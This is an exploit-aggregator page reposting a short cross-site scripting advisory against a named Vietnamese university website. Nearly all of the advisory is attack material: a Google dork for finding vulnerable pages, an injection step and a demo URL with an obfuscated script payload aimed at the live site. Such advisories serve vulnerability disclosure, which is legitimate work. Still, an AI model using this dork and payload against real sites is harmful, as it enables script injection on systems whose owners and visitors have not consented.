Advertisement






daihocpccc - Cross Site Scripting Vulnerability (XSS)

CVE Category Price Severity
N/A CWE-79 N/A High
Author Risk Exploitation Type Date
N/A High Remote 2022-08-28
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022080072

Below is a copy:

daihocpccc - Cross Site Scripting Vulnerability (XSS)
****************************
#Exploit Title:  daihocpccc - Cross Site Scripting Vulnerability (XSS)
#Date: 08/27/2022
#Exploit Author: Mahdi Nikan
#Vendor Homepage: https://daihocpccc.edu.vn
#Google Dork: inurl:index.php?id=
#Tested On: Ubuntu


Proof of Concept:
1-Search dork
2-https://daihocpccc.edu.vn/tc/index.php?id=001" > [XSS Inject Payload ]

Demo: https://daihocpccc.edu.vn/tc/index.php?id=001%3C?%20echo('%3CSCR)';echo('IPT%3Ealert(%22XSS%22)%3C/SCRIPT%3E');%20?%3E%0A

**************************************************
#Discovered by: Mahdi Nikan
#Email : [email protected]
**************************************************

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.